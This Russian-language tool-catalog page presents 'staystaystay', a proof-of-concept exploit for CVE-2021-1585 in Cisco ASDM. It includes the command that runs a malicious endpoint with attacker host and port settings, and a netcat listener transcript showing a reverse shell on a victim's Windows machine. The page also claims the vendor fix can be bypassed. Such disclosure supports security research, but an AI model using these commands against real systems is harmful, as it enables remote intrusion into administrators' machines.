Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
staystaystay — Доказательство концепции для CVE-2021-1585: Cisco ASA Device Manager RCE | Kitploit
Инструменты/GitHubGitHub/jbaines-r7/staystaystay
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubjbaines-r7/staystaystay

staystaystay

Доказательство концепции для CVE-2021-1585: Cisco ASA Device Manager RCE

Репозиторий
134134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

staystaystay

staystaystay — это доказательство концепции эксплуатации для CVE-2021-1585, проблемы RCE типа «человек посередине» или злонамеренная конечная точка, затрагивающая Cisco ASA Device Manager (ASDM). Проблема была первоначально обнаружена Malcolm Lashley и раскрыта летом 2021 года. Однако в то время, когда я изучал это, она была неисправлена в последней версии (ASDM 7.17(1)), я наткнулся на это независимо.

Cisco "исправила" это в ASDM 7.18(1.152). Я говорю "исправила", потому что этот эксплойт все еще прекрасно работает. Пользователю просто нужно нажать "Да". Смотрите видео ниже.

Атакующие могут настроить два типа полезных нагрузок для получения обратной оболочки на жертву:

  • на основе jjs.exe (файл записывается на диск — и это недавно было обнаружено Защитником Windows)
  • на основе Longtime Sunshine

Если жертва подключает свой ASDM к staystaystay, то он внедрит настроенную полезную нагрузку, что приведет к обратной оболочке. Обратную оболочку jjs можно перехватить с помощью обычного слушателя nc (или даже Metasploit, если хотите). Опция Longtime Sunshine требует, чтобы атакующий использовал этот фреймворк.

В качестве примера следующая команда запустит staystaystay на порту 8443 с полезной нагрузкой :

jjs
root@kitploit:~
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

Как только жертва подключается к 8443, обратная оболочка будет сгенерирована на 10.0.0.2:1270:

root@kitploit:~
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

Следующее видео содержит пример эксплуатации с Longtime Sunshine:

  • https://www.youtube.com/watch?v=07VO2JGTWR8

Следующее видео демонстрирует атаку на исправленную версию:

  • https://www.youtube.com/watch?v=ySgbHClk9HE

Описание на AttackerKB можно найти здесь:

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

Благодарности

  • Taylor Swift - Акустическая версия
Скачать инструмент